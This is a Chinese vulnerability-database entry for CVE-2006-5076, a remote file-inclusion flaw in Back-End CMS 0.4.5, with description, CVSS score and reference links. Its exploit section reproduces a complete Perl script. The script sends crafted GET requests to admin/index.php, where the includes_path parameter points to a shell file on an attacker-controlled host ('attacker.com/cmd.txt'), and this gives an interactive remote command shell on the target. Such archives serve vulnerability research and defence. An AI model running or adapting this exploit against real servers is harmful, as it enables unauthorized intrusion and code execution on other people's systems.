OpenConcept Back-End 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111124 漏洞类型 输入验证
发布时间 2006-09-25 更新时间 2006-10-17
CVE编号 CVE-2006-5076 CNNVD-ID CNNVD-200609-520
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28674
https://www.securityfocus.com/bid/20207
https://cxsecurity.com/issue/WLB-2006100016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-520
|漏洞详情
OpenConceptBack-End中存在多个PHP远程文件包含漏洞,远程攻击者可以通过(1)admin/index.php、(2)Facts.php或(3)search.php的includes_path参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20207/info

Back-End CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Back-End CMS version 0.4.5 is vulnerable to these issues.

#!/usr/bin/perl

#################################################################
#                                                               #
#            Back-end                                           #
#                                                               #
# Class:     Remote File Include Vulnerability                  #
#                                                               #
# Discovered By :     Root3r_H3LL = |)\0073|)\_|-|311           #
#                                                               #
# Original Advisory : http://Www.PersainFox.coM                 #
#                                                               #
# Remote:    Yes                                                #
#                                                               #
# Type:      high                                               #
#                                                               #
#                                                               #
#################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your Personal Script

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "#   Back-end =>  0.4.5     Remote File Include Vulnerability    #\n";
print "#            Bug found By : PerSianFox Security                 #\n";
print "#        Email: Root3r_H3LL    Root3r_ir[at]yahoo.com           #\n";
print "#               Web Site : Www.PerSianFox.coM                   #\n";
print "#                We ArE :Root3r_H3LL,Arashrj                    #\n";
print "#                                                               #\n";
print "#                                                               #\n";
print "#                 </\/\\/_ 10\/3 15 1|)\4/\/                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV < 2)
{
    print "\n Usage: Root3r.pl [host] [path] ";
    print "\n EX : Root3r.pl www.victim.com /[path]/  \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path."/admin/index.php?includes_path=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "<Shell> ";
    $cmd = <STDIN>;
}
|受影响的产品
Back-End CMS Back-End CMS 0.4.5
|参考资料

来源:XF
名称:back-end-includes-file-include(29172)
链接:http://xforce.iss.net/xforce/xfdb/29172
来源:BID
名称:20207
链接:http://www.securityfocus.com/bid/20207
来源:BUGTRAQ
名称:20060925Back-end=>0.4.5RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/447005/100/0/threaded
来源:XF
名称:backend-index-file-include(29605)
链接:http://xforce.iss.net/xforce/xfdb/29605
来源:BUGTRAQ
名称:20061028Back-end=>0.4.5RemoteFileIncludeVulnerabilityExploit
链接:http://www.securityfocus.com/archive/1/archive/1/450031/100/200/threaded
来源:BUGTRAQ
名称:20061015Back-end(FileIncludeVulnerabilityExploit)
链接:http://www.securityfocus.com/archive/1/archive/1/448776/100/0/threaded
来源:SREASON
名称:1650
链接:http://securityreason.com/securityalert/1650